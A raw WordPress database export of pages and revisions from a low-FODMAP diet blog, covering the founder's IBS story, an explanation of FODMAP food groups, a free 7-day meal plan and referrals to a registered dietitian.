Who is the 7-day Tummy Taming plan for?Anyone with a troubling tummy who would like to feel better and healthier.Why should do the 7-day plan?Why not! It\'s completely free with no catches and it will only make you feel better.The 7-day plan is a beginners guide to understanding how food can affect, heal and nourish your tummy and ultimately your whole body and mind.
If you love the plan a more detailed 21 day plan will be available soon - watch this space!Can other family members eat the food in the plan?Yes, the food is healthy, well balanced and safe for the whole family to eat.What should I consider before going on the 7-day plan?As with any diet, it\'s a good idea to make sure that your symptoms are not caused by any other underlying health problems and your GP can help you with any concerns you might have.For people suffering with severe IBS we recommend that you work together with a FODMAP trained dietitian that can look at your specific needs and support you during the plan. \n\n

\n','Q&A','','inherit','closed','closed','','4860-revision-v1','','','2020-04-05 21:21:43','2020-04-05 21:21:43','',4860,'http://tummyrevolution.com/4860-revision-v1/',0,'revision','',0),(4863,1,'2020-04-05 21:23:54','2020-04-05 21:23:54','\n\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health. My other passion is photography and I feel lucky to be able to combine my love for cooking with photography.

\n\n\n\n

I was born and brought up in Sweden before moving to the UK in my late teens where I initially studied and later meet my husband Andrew. In 2016 we moved to Dubai where we now currently live. I tend to spend our time between the UK, Sweden and Dubai and feel lucky to have the opportunity to see and experience different countries, cultures, food and people. I love an adventure and always look forward to the next one.

\n\n\n\n

I’m also a mum of twins Noah and Evelyn, who are my fabulous food critics. They will tell me honestly if what I cook is good or bad and love sampling my food, especially the deserts and treats.

\n\n\n\n
\"\"
\n\n\n\n


Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

If you\'d like further help and advice I\'ve published a book, \'Tummy Revolution 21, Gut Health Made Simple\' . It\'s a 21 day plan to help you get your tummy back on track. It contains, weekly meal plans, shopping lists 50+ recipes, Youga exercises and much, much more. It\'s your ultimate guide to taming your tummy and to getting your health back on track. You can read more about it here

\n\n\n\n
\"\"
\n\n\n\n


There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes and tips!!
Thank you checking in and hope you stay for a while.
xoxo
Sara 

\n\n\n\n
\"\"/
\n\n\n\n


\n','My Story','','publish','closed','closed','','my-story','','','2020-04-22 14:47:37','2020-04-22 14:47:37','',0,'http://tummyrevolution.com/?page_id=4863',0,'page','',0),(4864,1,'2020-04-05 21:23:15','2020-04-05 21:23:15','\n

We hope you take happiness and health from our website and want to thank you for checking us out.

\n\n\n\n
\"\"/
\n\n\n\n

I’m Sara Chadwick, founder of Tummy Revolution and long-term sufferer of digestive troubles and IBS related symptoms.

I stumbled across the low-FODMAP diet during my personal research into better tummy health and it soon became clear this was the solution to all my tummy problems.  The low-FODMAP diet is more about finding out how your body breaks down food and how our tummies react to different food rather then a “diet” in the normal term. Once I had understood how my tummy reacted to different food and made adjustments to my diet, all my tummy problems disappeared and I now feel amazing! 

\n\n\n\n

Tummy Revolution came about as I knew there must be others like me out there suffering for years with no solution and little help.  Adjusting your lifestyle and making changes to your diet on your own can be a challenge and struggle for many.  I wanted Tummy Revolution to be a place where tummy sufferers could come for help to make changes to their own tummies and health in a new, exciting and fresh way.

\n\n\n\n

I don’t really didn\'t like the word \"diet\" as it just oozes limitation.  Instead I wanted to throw away any limitations and provide tummy sufferers with an exciting plan and challenge, which involved eating delicious tasting food that tummies love. 

\n\n\n\n

I’m now on a mission to revolutionise all tummies out there and to stop them behaving badly once and for all! The key to a happy tummy lies within each of us and we hope you can find inspiration at Tummy Revolution, to go on your own journey to find yours.

\n\n\n\n

Sara
xoxox

\n','Our Stories','','inherit','closed','closed','','4861-revision-v1','','','2020-04-05 21:23:15','2020-04-05 21:23:15','',4861,'http://tummyrevolution.com/4861-revision-v1/',0,'revision','',0),(4865,1,'2020-04-05 21:23:54','2020-04-05 21:23:54','\n
\"\"/
\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health

My other passion is photography and I feel lucky to be able to combine my love for cooking with photography. I’m also a busy mum of cheeky but gorgeous twins and spend any spare time I have with my family.

Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes, tips and an exciting new book!!

Thank you checking in and hope you stay for a while.

Sara 

\n','My Story','','inherit','closed','closed','','4863-revision-v1','','','2020-04-05 21:23:54','2020-04-05 21:23:54','',4863,'http://tummyrevolution.com/4863-revision-v1/',0,'revision','',0),(4866,1,'2020-04-05 21:24:33','2020-04-05 21:24:33','\n
\"\"/
\n\n\n\n
\"\"/
\n','Manufacturing','','publish','closed','closed','','manufacturing','','','2020-04-05 21:24:34','2020-04-05 21:24:34','',0,'http://tummyrevolution.com/?page_id=4866',0,'page','',0),(4867,1,'2020-04-05 21:29:29','2020-04-05 21:29:29','\n

So…..what is the low-FODMAP diet and how can it help you?

\n\n\n\n

Millions of people suffer from some sort of digestive distress such as bloating, stomach cramps, constipation or IBS. Most people realise some foods they eat play a role in their symptoms but find it hard to pinpoint exactly everything that triggers them.

\n\n\n\n

We feel your pain it happened to us too. We both suffered with our tummies and have been frustrated trying to find a solution. During our research into how to find a cure we stumbled upon the Low-FODMAP diet (Fanfare please).
If you haven\'t heard of it before you\'re not the alone.

\n\n\n\n

It\'s based on fairly new research by Dr Sue Shepard and is now seen as one of the most effective ways to treat those suffering with gut problems.

\n\n\n\n

So what does it actually mean?

\n\n\n\n

Well, the low-FODMAP diet is a diet low in Fermentable Oligo-, Di-, Mono-saccharides and Polyos.

\n\n\n\n

Confused? don\'t worry.

\n\n\n\n

FODMAPs are simply a group of carbohydrates (sugars) that are found in certain foods

\n\n\n\n

To explain it in simple terms this is how it works;
FODMAPs can not always be broken down in the thin intestine so they move slowly into the large intestine. The large intestine is full of bacteria which rapidly break down the FODMAPs generating lots of gas when they are fermented. Some of the FODMAPs can also draw water into the intestine effecting the muscular movement of the gut. The excess water and gas can make you run to the bathroom or make you feel uncomfortably full and bloated. By removing FODMAPs from your diet you can remove the cause of the excess water and gas helping improve your IBS symptoms

\n\n\n\n

How does the diet work?
The diet starts by eliminating all food containing FODMAPs for 2-6 weeks depending on your symptoms. You then reintroduce FODMAP foods back into your diet, one type at a time.  Some FODMAPs cause more trouble in some people than others so it is important to track your symptoms when reintroducing to determine which foods are your own personal triggers.  You then continue on a low-FODMAP diet and once your symptoms have subsided you can move on to test another FODMAP group .

\n\n\n\n

Once the reintroduction process is complete you can customise the low- FODMAP diet to limit your personal triggers. If for example peaches (and/or other Polyols) trigger your symptoms you may choose to only eat peaches occasionally and perhaps not a whole peach but only a few slices.

\n\n\n\n

So what are the different FODMAP types and foods?

\n\n\n\n

Below are some examples of different high FODMAP types, i.e things not to eat during the elimination process....

\n\n\n\n

Monosaccharides (Fructose) - Honey, apples, pears, mangoes, asparagus, cherries, watermelon, fruit juice, sugar snap peas

\n\n\n\n

Disaccharides (lactose) – Cow’s milk, sheep’s milk, goat’s milk, ice cream, yoghurt, sour cream, soft cheeses like cottage cheese and ricotta.

\n\n\n\n

Oligosaccharides (Fructans) – Onions, garlic, leeks, shallots, wheat, couscous, pasta, rye, red cabbage, brussel sprouts

\n\n\n\n

Oligosaccharides (GOS) – Non-canned lentils, non-canned chickpeas, hummus, kidney beans,pinto,peas, whole soybeans

\n\n\n\n

Polyols – Apricots, peaches, nectarines, plums, prunes, blackberries, lychees, cauliflower, mushrooms

\n\n\n\n

You can get a better understanding of high and low FODMAPs by taking a look at our quick guide to FODMAP foods

\n\n\n\n

The low-FODMAP diet is not for everyone
Please make sure that you just don’t jump on this diet, we recommend that you first read up about FODMAPs and what this diet entails. We have summarised what you need to consider before starting the low-FODMAP on our \"Considerations before starting the low-FODMAP diet\" page.

\n\n\n\n

There are some really good books, websites and Apps available covering FODMAPs and the low-FODMAP diet. We have listed a few of our favourites below.

\n\n\n\n

We have also put together some more information we found useful under How to get started.

\n\n\n\n

Books
IBS – Free at last by Patsy Catsos

\n\n\n\n

The Complete Low-FODMAP Diet By Sue Shepherd, Peter Gibson and Chey D William

\n\n\n\n

Low-FODMAP 28 – Day Plan by Kate Scarlata

\n\n\n\n

The Low-FODMAP Diet Cookbook by Sue Shepherd

\n\n\n\n

Websites

\n\n\n\n

Monash University’s Low-FODMAP diet for Irritable Bowel Syndrome
http://www.med.monash.edu/cecs/gastro/fodmap/

\n\n\n\n

IBS Diets FODMAP Dieting Guide
www.ibsdiets.org/fodmap-diet/fodmap-food-list

\n\n\n\n

IBS, FODMAP Diet by Kate Scarlata
http://www.katescarlata.com

\n\n\n\n

Shephered Works’ Low-FODMAP Diet by Dr. Sue Shepard
http://shepherdworks.com.au

\n\n\n\n

Kings Collage,  Low-FODMAP Diet FAQ
http://www.kcl.ac.uk/lsm/research/divisions/dns/projects/fodmaps/faq.aspx

\n\n\n\n

Tools and Apps

\n\n\n\n

Monash University’s Low-FODMAP Diet App
http://www.med.monash.edu.au/cecs/gastro/fodmap/iphone-app.html

\n\n\n\n

Low-FODMAP IBS Diet APP
http://www.lowfodmapibsdiet.com/low-fodmap-ibs-diet-app/

\n','What are FODMAPS','','publish','closed','closed','','what-are-fodmaps','','','2020-04-05 21:29:30','2020-04-05 21:29:30','',0,'http://tummyrevolution.com/?page_id=4867',0,'page','',0),(4868,1,'2020-04-05 21:24:33','2020-04-05 21:24:33','\n
\"\"/
\n\n\n\n
\"\"/
\n','Manufacturing','','inherit','closed','closed','','4866-revision-v1','','','2020-04-05 21:24:33','2020-04-05 21:24:33','',4866,'http://tummyrevolution.com/4866-revision-v1/',0,'revision','',0),(4869,1,'2020-04-05 21:25:05','2020-04-05 21:25:05','\n

So here is why Tummy Revolution all started...

\n\n\n\n
\"\"/
\n\n\n\n
\nhttp://www.med.monash.edu/cecs/gastro/fodmap/\n
\n','Making Your Body Feel Better','','publish','closed','closed','','making-your-body-feel-better','','','2020-04-05 21:25:07','2020-04-05 21:25:07','',0,'http://tummyrevolution.com/?page_id=4869',0,'page','',0),(4870,1,'2020-04-05 21:25:05','2020-04-05 21:25:05','\n

So here is why Tummy Revolution all started...

\n\n\n\n
\"\"/
\n\n\n\n
\nhttp://www.med.monash.edu/cecs/gastro/fodmap/\n
\n','Making Your Body Feel Better','','inherit','closed','closed','','4869-revision-v1','','','2020-04-05 21:25:05','2020-04-05 21:25:05','',4869,'http://tummyrevolution.com/4869-revision-v1/',0,'revision','',0),(4871,1,'2020-04-05 21:27:04','2020-04-05 21:27:04','\n

\n\n\n\n

IT\'S HERE! SIGN UP NOW FOR YOUR FREE 7-DAY TUMMY TAMING PLAN

\n\n\n\n

\n\n\n\n

Do you have a misbehaving tummy that cause you embarrassment, pain or bloating?Well, here’s the good news!We can guide you to a new life, free of tummy problems.  Whether you have been diagnosed with IBS, gluten sensitivity or have other tummy issues - don’t suffer in silence – let us help!  We will share how to take control of your tummy through changing the way you eat, leaving you feeling amazing.Join us on the road to feeling the way you are supposed to feel – the way to a brand new you!

\n\n\n\n
\"\"/
\n','Let Us Help You Take Control of Your Tummy','','publish','closed','closed','','let-us-help-you-take-control-of-your-tummy','','','2020-04-05 21:27:05','2020-04-05 21:27:05','',0,'http://tummyrevolution.com/?page_id=4871',0,'page','',0),(4872,1,'2020-04-05 21:27:04','2020-04-05 21:27:04','\n

\n\n\n\n

IT\'S HERE! SIGN UP NOW FOR YOUR FREE 7-DAY TUMMY TAMING PLAN

\n\n\n\n

\n\n\n\n

Do you have a misbehaving tummy that cause you embarrassment, pain or bloating?Well, here’s the good news!We can guide you to a new life, free of tummy problems.  Whether you have been diagnosed with IBS, gluten sensitivity or have other tummy issues - don’t suffer in silence – let us help!  We will share how to take control of your tummy through changing the way you eat, leaving you feeling amazing.Join us on the road to feeling the way you are supposed to feel – the way to a brand new you!

\n\n\n\n
\"\"/
\n','Let Us Help You Take Control of Your Tummy','','inherit','closed','closed','','4871-revision-v1','','','2020-04-05 21:27:04','2020-04-05 21:27:04','',4871,'http://tummyrevolution.com/4871-revision-v1/',0,'revision','',0),(4873,1,'2020-04-05 21:27:42','2020-04-05 21:27:42','\n

\n\nGet new delicious tummy recipes, tips and an absolutely FREE 7 day Tummy Taming Plan!

\n\n\n\n

Want to feel great? join us!\n\n

\n','Kick start your tummy with our FREE 7-day Tummy Taming Plan','','publish','closed','closed','','kick-start-your-tummy-with-our-free-7-day-tummy-taming-plan','','','2020-04-05 21:27:42','2020-04-05 21:27:42','',0,'http://tummyrevolution.com/?page_id=4873',0,'page','',0),(4874,1,'2020-04-05 21:27:42','2020-04-05 21:27:42','\n

\n\nGet new delicious tummy recipes, tips and an absolutely FREE 7 day Tummy Taming Plan!

\n\n\n\n

Want to feel great? join us!\n\n

\n','Kick start your tummy with our FREE 7-day Tummy Taming Plan','','inherit','closed','closed','','4873-revision-v1','','','2020-04-05 21:27:42','2020-04-05 21:27:42','',4873,'http://tummyrevolution.com/4873-revision-v1/',0,'revision','',0),(4875,1,'2020-04-05 21:29:10','2020-04-05 21:29:10','\n
\"\"/
\n','Tummy Revolution 21','','publish','closed','closed','','tummy-revolution-21','','','2020-04-05 21:29:11','2020-04-05 21:29:11','',0,'http://tummyrevolution.com/?page_id=4875',0,'page','',0),(4876,1,'2020-04-05 21:29:10','2020-04-05 21:29:10','\n
\"\"/
\n','Tummy Revolution 21','','inherit','closed','closed','','4875-revision-v1','','','2020-04-05 21:29:10','2020-04-05 21:29:10','',4875,'http://tummyrevolution.com/4875-revision-v1/',0,'revision','',0),(4877,1,'2020-04-05 21:29:29','2020-04-05 21:29:29','\n

So…..what is the low-FODMAP diet and how can it help you?

\n\n\n\n

Millions of people suffer from some sort of digestive distress such as bloating, stomach cramps, constipation or IBS. Most people realise some foods they eat play a role in their symptoms but find it hard to pinpoint exactly everything that triggers them.

\n\n\n\n

We feel your pain it happened to us too. We both suffered with our tummies and have been frustrated trying to find a solution. During our research into how to find a cure we stumbled upon the Low-FODMAP diet (Fanfare please).
If you haven\'t heard of it before you\'re not the alone.

\n\n\n\n

It\'s based on fairly new research by Dr Sue Shepard and is now seen as one of the most effective ways to treat those suffering with gut problems.

\n\n\n\n

So what does it actually mean?

\n\n\n\n

Well, the low-FODMAP diet is a diet low in Fermentable Oligo-, Di-, Mono-saccharides and Polyos.

\n\n\n\n

Confused? don\'t worry.

\n\n\n\n

FODMAPs are simply a group of carbohydrates (sugars) that are found in certain foods

\n\n\n\n

To explain it in simple terms this is how it works;
FODMAPs can not always be broken down in the thin intestine so they move slowly into the large intestine. The large intestine is full of bacteria which rapidly break down the FODMAPs generating lots of gas when they are fermented. Some of the FODMAPs can also draw water into the intestine effecting the muscular movement of the gut. The excess water and gas can make you run to the bathroom or make you feel uncomfortably full and bloated. By removing FODMAPs from your diet you can remove the cause of the excess water and gas helping improve your IBS symptoms

\n\n\n\n

How does the diet work?
The diet starts by eliminating all food containing FODMAPs for 2-6 weeks depending on your symptoms. You then reintroduce FODMAP foods back into your diet, one type at a time.  Some FODMAPs cause more trouble in some people than others so it is important to track your symptoms when reintroducing to determine which foods are your own personal triggers.  You then continue on a low-FODMAP diet and once your symptoms have subsided you can move on to test another FODMAP group .

\n\n\n\n

Once the reintroduction process is complete you can customise the low- FODMAP diet to limit your personal triggers. If for example peaches (and/or other Polyols) trigger your symptoms you may choose to only eat peaches occasionally and perhaps not a whole peach but only a few slices.

\n\n\n\n

So what are the different FODMAP types and foods?

\n\n\n\n

Below are some examples of different high FODMAP types, i.e things not to eat during the elimination process....

\n\n\n\n

Monosaccharides (Fructose) - Honey, apples, pears, mangoes, asparagus, cherries, watermelon, fruit juice, sugar snap peas

\n\n\n\n

Disaccharides (lactose) – Cow’s milk, sheep’s milk, goat’s milk, ice cream, yoghurt, sour cream, soft cheeses like cottage cheese and ricotta.

\n\n\n\n

Oligosaccharides (Fructans) – Onions, garlic, leeks, shallots, wheat, couscous, pasta, rye, red cabbage, brussel sprouts

\n\n\n\n

Oligosaccharides (GOS) – Non-canned lentils, non-canned chickpeas, hummus, kidney beans,pinto,peas, whole soybeans

\n\n\n\n

Polyols – Apricots, peaches, nectarines, plums, prunes, blackberries, lychees, cauliflower, mushrooms

\n\n\n\n

You can get a better understanding of high and low FODMAPs by taking a look at our quick guide to FODMAP foods

\n\n\n\n

The low-FODMAP diet is not for everyone
Please make sure that you just don’t jump on this diet, we recommend that you first read up about FODMAPs and what this diet entails. We have summarised what you need to consider before starting the low-FODMAP on our \"Considerations before starting the low-FODMAP diet\" page.

\n\n\n\n

There are some really good books, websites and Apps available covering FODMAPs and the low-FODMAP diet. We have listed a few of our favourites below.

\n\n\n\n

We have also put together some more information we found useful under How to get started.

\n\n\n\n

Books
IBS – Free at last by Patsy Catsos

\n\n\n\n

The Complete Low-FODMAP Diet By Sue Shepherd, Peter Gibson and Chey D William

\n\n\n\n

Low-FODMAP 28 – Day Plan by Kate Scarlata

\n\n\n\n

The Low-FODMAP Diet Cookbook by Sue Shepherd

\n\n\n\n

Websites

\n\n\n\n

Monash University’s Low-FODMAP diet for Irritable Bowel Syndrome
http://www.med.monash.edu/cecs/gastro/fodmap/

\n\n\n\n

IBS Diets FODMAP Dieting Guide
www.ibsdiets.org/fodmap-diet/fodmap-food-list

\n\n\n\n

IBS, FODMAP Diet by Kate Scarlata
http://www.katescarlata.com

\n\n\n\n

Shephered Works’ Low-FODMAP Diet by Dr. Sue Shepard
http://shepherdworks.com.au

\n\n\n\n

Kings Collage,  Low-FODMAP Diet FAQ
http://www.kcl.ac.uk/lsm/research/divisions/dns/projects/fodmaps/faq.aspx

\n\n\n\n

Tools and Apps

\n\n\n\n

Monash University’s Low-FODMAP Diet App
http://www.med.monash.edu.au/cecs/gastro/fodmap/iphone-app.html

\n\n\n\n

Low-FODMAP IBS Diet APP
http://www.lowfodmapibsdiet.com/low-fodmap-ibs-diet-app/

\n','What are FODMAPS','','inherit','closed','closed','','4867-revision-v1','','','2020-04-05 21:29:29','2020-04-05 21:29:29','',4867,'http://tummyrevolution.com/4867-revision-v1/',0,'revision','',0),(4878,1,'2020-04-05 21:29:59','2020-04-05 21:29:59','\n
\"\"/
\n','We are starting in Honduras','','publish','closed','closed','','we-are-starting-in-honduras','','','2020-04-05 21:29:59','2020-04-05 21:29:59','',0,'http://tummyrevolution.com/?page_id=4878',0,'page','',0),(4879,1,'2020-04-05 21:30:24','2020-04-05 21:30:24','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','TUMMY REVOLUTION\'S FREE RESOURCES','','publish','closed','closed','','tummy-revolutions-free-resources','','','2020-04-05 21:30:25','2020-04-05 21:30:25','',0,'http://tummyrevolution.com/?page_id=4879',0,'page','',0),(4880,1,'2020-04-05 21:29:59','2020-04-05 21:29:59','\n
\"\"/
\n','We are starting in Honduras','','inherit','closed','closed','','4878-revision-v1','','','2020-04-05 21:29:59','2020-04-05 21:29:59','',4878,'http://tummyrevolution.com/4878-revision-v1/',0,'revision','',0),(4881,1,'2020-04-05 21:30:24','2020-04-05 21:30:24','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','TUMMY REVOLUTION\'S FREE RESOURCES','','inherit','closed','closed','','4879-revision-v1','','','2020-04-05 21:30:24','2020-04-05 21:30:24','',4879,'http://tummyrevolution.com/4879-revision-v1/',0,'revision','',0),(4882,1,'2020-04-05 21:30:46','2020-04-05 21:30:46','\n
\"\"/
\n','Tummy Revolution 7','','publish','closed','closed','','tummy-revolution-7','','','2020-04-05 21:30:47','2020-04-05 21:30:47','',0,'http://tummyrevolution.com/?page_id=4882',0,'page','',0),(4883,1,'2020-04-05 21:30:46','2020-04-05 21:30:46','\n
\"\"/
\n','Tummy Revolution 7','','inherit','closed','closed','','4882-revision-v1','','','2020-04-05 21:30:46','2020-04-05 21:30:46','',4882,'http://tummyrevolution.com/4882-revision-v1/',0,'revision','',0),(4884,1,'2020-04-05 21:31:32','2020-04-05 21:31:32','\n

CLICK HERE TO DOWNLOAD

\n\n\n\n

Please note: Users make use of the site and services at their sole responsibility, whatever their state of health at the time they register, and throughout their use of the services.

\n\n\n\n
\"\"/
\n','Tummy Revolution 7','','publish','closed','closed','','tummy-revolution-7-2','','','2020-04-05 21:31:33','2020-04-05 21:31:33','',0,'http://tummyrevolution.com/?page_id=4884',0,'page','',0),(4885,1,'2020-04-05 21:31:48','2020-04-05 21:31:48','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Tummy Revolution 21 Gut Health made simple','','publish','closed','closed','','tummy-revolution-21-gut-health-made-simple','','','2020-04-19 02:36:02','2020-04-19 02:36:02','',0,'http://tummyrevolution.com/?page_id=4885',0,'page','',0),(4886,1,'2020-04-05 21:31:32','2020-04-05 21:31:32','\n

CLICK HERE TO DOWNLOAD

\n\n\n\n

Please note: Users make use of the site and services at their sole responsibility, whatever their state of health at the time they register, and throughout their use of the services.

\n\n\n\n
\"\"/
\n','Tummy Revolution 7','','inherit','closed','closed','','4884-revision-v1','','','2020-04-05 21:31:32','2020-04-05 21:31:32','',4884,'http://tummyrevolution.com/4884-revision-v1/',0,'revision','',0),(4887,1,'2020-04-05 21:31:48','2020-04-05 21:31:48','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Tummy Revolution 21 Gut Health made simple','','inherit','closed','closed','','4885-revision-v1','','','2020-04-05 21:31:48','2020-04-05 21:31:48','',4885,'http://tummyrevolution.com/4885-revision-v1/',0,'revision','',0),(4888,1,'2020-04-05 21:33:44','2020-04-05 21:33:44','\n
\"\"/
\n

We are really proud to work with yoga teacher Kerry Morgan. She\'s an incredibly talented, ambitious and kind hearted person that brings us real inspiration. We are currently working on a number of Tummy Friendly sequences with Kerry to relieve stress and aid relaxation, available later this year.

\n
\n\n\n\n

\n\n\n\n

Kerry teaches mindfully, with compassion and always from the heart. Her playful and light hearted approach helps guide her students to observe their mind and understand their bodies in a way that unites the body, mind and soul.Kerry believes in working hard yet mindfully, allowing ourselves to explore new challenges with a principle of acceptance and kindness towards ourself. She maintains focus on core integration and alignment stemming from her desire to use yoga as a tool to heal and strengthen the body and mind. Yoga with Kerry gives you the time and space to connect more deeply with yourself and your practice.You can find out more about Kerry and the yoga she teaches here
You must also check out Kerry\'s beach yoga video.It really makes us what to pick up our yoga mats and head for the beach!

\n\n\n\n
\n\n\n\n

Yoga with Kerry - Beach Yoga from Kerry on Vimeo.

\n','Yoga','','publish','closed','closed','','yoga','','','2020-04-05 21:33:45','2020-04-05 21:33:45','',0,'http://tummyrevolution.com/?page_id=4888',0,'page','',0),(4889,1,'2020-04-05 21:33:44','2020-04-05 21:33:44','\n
\"\"/
\n

We are really proud to work with yoga teacher Kerry Morgan. She\'s an incredibly talented, ambitious and kind hearted person that brings us real inspiration. We are currently working on a number of Tummy Friendly sequences with Kerry to relieve stress and aid relaxation, available later this year.

\n
\n\n\n\n

\n\n\n\n

Kerry teaches mindfully, with compassion and always from the heart. Her playful and light hearted approach helps guide her students to observe their mind and understand their bodies in a way that unites the body, mind and soul.Kerry believes in working hard yet mindfully, allowing ourselves to explore new challenges with a principle of acceptance and kindness towards ourself. She maintains focus on core integration and alignment stemming from her desire to use yoga as a tool to heal and strengthen the body and mind. Yoga with Kerry gives you the time and space to connect more deeply with yourself and your practice.You can find out more about Kerry and the yoga she teaches here
You must also check out Kerry\'s beach yoga video.It really makes us what to pick up our yoga mats and head for the beach!

\n\n\n\n
\n\n\n\n

Yoga with Kerry - Beach Yoga from Kerry on Vimeo.

\n','Yoga','','inherit','closed','closed','','4888-revision-v1','','','2020-04-05 21:33:44','2020-04-05 21:33:44','',4888,'http://tummyrevolution.com/4888-revision-v1/',0,'revision','',0),(4890,1,'2020-04-22 09:34:00','2020-04-22 09:34:00','\n

Because the low-FODMAP diet is a medical diet it is always recommend that you work with a FODMAP trained dietitian if you decide to follow the low FODMAP diet. A trained dietitian can work together with you to develop a specific plan tailored around your individual needs. If you, for example, have other food allergies or underlying issues, a dietitian can help you work out if the low FODMAP diet is right for you and what the right approach is.

\n\n\n\n

I work closely together with Debra Thomas who is a Registered Dietitian with the Health Care Professions Council, a member of the British Dietetic Association and a listed member of the BDA’s Freelance Dietitians Group.

\n\n\n\n

As a Nutrition Consultant and Advanced Practitioner, she has over 18 years’ experience of advising on a range of therapeutic diets, but her specialism is the treatment of irritable bowel syndrome (IBS). She has been certified by King’s College London, to deliver tailor-made advice on the low FODMAP diet as an effective treatment for IBS. She\'s worked for many years in the NHS in the UK and she\'s also the founder of FODMAP Consultancy. If you have questions or would like to set up an appointment/Skype call, you can find more information about Debra and her FODMAP Consultancy by visiting her website  https://www.fodmapconsultancy.com

\n\n\n\n
\"\"
\n\n\n\n

If you\'re looking for a UK dietitian near you then the British Dietetic Association has a great search tool HERE where you can search for registered dietitian in your area.

In the US \'The Academy of Nutrition and Dietetics\' has a similar search facility on their website, which you can find HERE

Dietitians of Canada has a dietitian search facility HERE

And Dietitians Association of Australia have a search facility to find an accredited practising dietitian HERE

\n\n\n\n

\n','Working with a Dietitian','','publish','closed','closed','','working-with-a-dietitian','','','2020-04-22 13:09:47','2020-04-22 13:09:47','',0,'http://tummyrevolution.com/?page_id=4890',0,'page','',0),(4891,1,'2020-04-05 21:34:32','2020-04-05 21:34:32','\n

What\'s included in the 7-day plan?

\n\n\n\n

• Guide to prepare you for the 7 days and to help you on your journey

\n\n\n\n

• 7-day nutritious and healthy meal plan

\n\n\n\n

• Printer-friendly weekly shopping list to save you time, sanity and money

\n\n\n\n

